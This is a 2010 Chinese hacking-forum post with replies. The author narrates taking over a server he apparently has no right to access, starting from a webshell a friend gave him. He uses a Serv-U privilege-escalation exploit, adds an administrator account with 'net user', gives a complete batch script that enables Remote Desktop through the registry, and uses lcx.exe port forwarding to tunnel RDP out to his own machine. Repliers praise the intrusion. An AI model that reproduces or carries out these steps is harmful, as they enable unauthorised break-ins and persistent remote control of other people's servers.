Board logo

标题: [原创文章] 我的一次提权。。。 [打印本页]

作者: hyrz    时间: 2010-1-30 15:11     标题: 我的一次提权。。。

今天朋友丢了一个webshell给我,叫我帮他提权。拿到密码进去后,朋友说D盘可以浏览,进入D盘后看到很多敏感目录;如图1。6 D5 ]- T3 }! m( d5 f: ?  E
[attach]1777[/attach]: y3 D/ u1 g5 j$ E% b

! C" c- D; g" m! W! x0 R8 _6 V, S   我个人有个习惯,每次拿到webshell我都要看看支不支持ASP.NET,我认为它一般权限大于asp,可能是管理的疏漏吧。如是传了个aspx的大马,用自带的端口扫描工具,扫了下端口,1433和43958都开了。哈哈!这下有希望了!为了不走往前老套的方法,想到找sa密码,哈哈!这样提权还没试过。用大马自带的工具,看了下iis下有多少个站,才2个,我想一定不是虚拟空间。打开网站根目录下的conn.asp文件后,让我差点没晕倒!!用的是access数据库,看来sa走不通。走不通怎么办?当然是继续走咯!想到服务器还安装了serv-u,于是在C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\路径找到su的快捷方式;如图2[attach]1778[/attach](以后大家也可以参考我这种方法),用文本方式打开后找到了su的安装路径,心中一阵狂喜!原来su在D盘!哈哈,终于有希望了!找到su目录后当然是看ServUDaemon.ini文件是否能编辑,随便敲了几个字母回车后提示没权限。这种事情我早就预料到了!不过我还是有点怕,怕丢了大侠风范啊.哼。。看来要把它ServUDaemon.ini文件下载回来修改,由于电脑没装su,就全部下载回来了。打开一看还要注册,打开百度直接搜索破解版!~~~~(>_<)~~~~ 浪费了我宝贵的时间...安装好后给自己添加了一个管理员账户,目录设置在C盘。。。经过一番的修改,成了我一生最难忘的回忆。。。知道了吗?刚刚不是不可编辑吗?我修改它干什么??倒。。。心里真的快要达到绝望的境界!看了前辈不少的教程的我,当然班门弄斧下。想到刚刚我打开su的时候没有提示输入密码,说明是默认的SU账号。这时心里的欲火终于燃烧起来!在我电脑的垃圾箱里找到了Lake2和GoldSun的提权脚本,传了上去后,手一直在抖,心里想会不会成功??不成功一切都会结束?打开提权脚本,随意的设置了一下,点击添加,一会儿,提示添加成功。在cmdshell敲入"net user",回显的结果让我晕过去。看来上天注定我很失败!!!回显里没有我那神圣的账号。难道是提权脚本的问题吗?换了GoldSun的脚本再来一次。打开后点击添加,很快显示了添加成功!再次在cmdshell敲入"net user",有没! 看来一只鸡在我眼前都不能吃。。。收拾了战场,但心里还是过不去。现在都凌晨3:00了,而我一点睡意都没,可能都是这个webshell搞的。我不甘心啊。。。。在webshell我随便的逛了一下,点来点去,而就在这时我发现我的aspx大马里有一个su exp如图3,cmd这栏填入"net user XXX XXX /add",点击添加,马上就显示一大堆信息!把滚动条拉到最后,有条信息让我乐翻了天;如图4和5.为了验证是否添加成功就在cmdshell敲入"net user";如图6。# P8 ?7 i( R3 j3 U" s0 A, @8 o
图3:
+ \( \  i3 V8 H- T8 ^[attach]1779[/attach]
) e2 F* s! B9 ~
4 a5 c3 b% q2 u/ E1 f/ K  f图4:1 f+ l4 u, z( J6 E; D$ g
[attach]1780[/attach]6 B1 \' v/ G& m8 U7 g: D4 z' y( i
图5:
$ D6 {6 e7 h& D2 _2 H0 N" P3 s! l[attach]1781[/attach]2 {& X7 l( s* K& A' e

) q1 _$ i. m9 E9 l: N图6:
3 l2 e3 {4 F7 Q, {! I. k[attach]1782[/attach]% \- U9 v! E# m# t+ ]9 n) v

* @: L0 L- `; m2 E' K1 D! I
( [0 R; o# W  R6 q     看来添加成功了!打开端口扫描,发现3389端口没开,就传了个3389.exe,等了片刻后,在cmdshell里执行了3389.exe,在刷新下页面,发现没有打开,看来生效了!为了让我渺小的心灵得到冲刷,顺便在这小小短短的时间里到网上看下MM. 片刻后,我再次打开webshell,可以访问了。再次用自带的端口扫描工具扫描了下,发现没开;什么原因??晕死了。。。看来要问问Baidu了,过了一会我在网上找到了一个开3389 bat文件;代码如下:
  1. echo Windows Registry Editor Version 5.00>>3389.reg
  2. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
  3. echo "fDenyTSConnections"=dword:00000000>>3389.reg
  4. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
  5. echo "PortNumber"=dword:00000d3d>>3389.reg
  6. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
  7. echo "PortNumber"=dword:00000d3d>>3389.reg
  8. regedit /s 3389.reg
  9. del 3389.reg
复制代码
传到服务器运行了下,3389端口这才开了!兴奋的ing!想不到一个简单脚本叫比的上3389.exe,而且不要重启,真够凹。。。在cmdshell里敲入"ipconfig"回车,发现是内网的,怎么办??就算是开了3389也不一定连接的上,而且webshell的ip也显示内网的IP(如图7),刚刚还没看到,一看晕死!以为内网IP跑天下呢。。。刚好上次看了一个教程,叫端口转发,教程很简单!我推荐大家看下。/ l/ y% r; j- Z$ J
6 o  P/ I& v% e: r$ A1 B) ~" }# x1 L
图7:
& R# U) U. s' O% S5 }! O7 e[attach]1783[/attach]; L6 V" l" |  s2 Q& Z6 K
$ R( s* W5 f8 `& k' ?  {* f
    传了一个lcx.exe端口转发工具后,在cmdshell里执行"D:\DotComDemo\inc\lcx.exe -slave 本机公网ip 51 目标本地ip 3389 "(简单介绍:(将目标ip的3389端口转发到本机的51端口);如图8;0 q9 H7 O# a; P" `8 n
+ w3 Q- ^# ]# S' l! e7 d& i
图8:4 L$ w& h+ c# ]
[attach]1784[/attach]$ A+ L6 c2 V7 x5 }/ r& _
% F- ?. w  J1 F& X- A0 ]& H
      然后在本机执行"lcx.exe -listen 51 880",(简单介绍:监听本机的51端口,将目标主机转发过来的3389端口开放在本机的880端口)
6 F/ Z8 @$ S4 q& A7 R2 s8 |6 [8 m然后用mstsc连接本机880端口登陆(127.0.0.1:880) )记住如果lcx不做当前目录,就写绝对路径。倒!本机的lcx.exe没有回显,(如图:9)就再次在cmdshell里重复执行了一次,本地的lcx还是没回显!难道失败了?心里想,可能有时没回显吧。打开mstsc连接"127.0.0.1:880",哈哈!连接上了!如图10.敲入刚刚添加的账号,连接成功!如图11.哈哈。到此提权就结束了!* P( T& L- D6 W: m  R9 g0 z0 o
图9:
7 a' O- m% Q5 b$ ]1 t. p: C+ l[attach]1785[/attach]
6 [. a7 b% }; j! F. S图10:
1 A: ]; e3 ^6 O" o3 B& J8 Q5 Y7 W[attach]1786[/attach]
/ f* C% S2 z: Z3 v$ A8 x0 |, T1 y3 s3 G! j/ H# Q
图11:* t2 [9 X7 s9 y$ ?" g
[attach]1787[/attach]% y6 g9 L1 d  b0 \% f9 [
       不过个人还是有点经验给大家分享!如果大家拿到webshell可以看看支不支持ASP.NET(aspx),如果支持可能会给你一个好的收获!还有一些黑友抱怨,sam文件下载不到或复制不到,个人之前用php大马就可以下载的了,你们可以试下!小弟的文笔有点差,能看的就将就看下。有什么问题加我Q:345432349.千万不要问我帮忙之类的,我们可以一起交流分享!
作者: 柔肠寸断    时间: 2010-1-30 20:12

aspx  su   lcx....
作者: hyrz    时间: 2010-1-30 20:23

断肠是不是你改了我标题?
作者: 柔肠寸断    时间: 2010-1-30 23:32

额,是的,要像篇文章啊。。。
作者: fl2012    时间: 2010-1-31 03:49

学习吧都是知识
作者: zollll    时间: 2010-2-12 09:46

楼主真厉害,3389
作者: lr163    时间: 2010-3-5 19:38

呵呵,学习了,谢谢楼主的分享!
作者: lr163    时间: 2010-3-5 19:38

呵呵,学习了,谢谢楼主的分享!
作者: 在意z    时间: 2012-5-16 00:16

谢谢楼主分享技术。。。




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2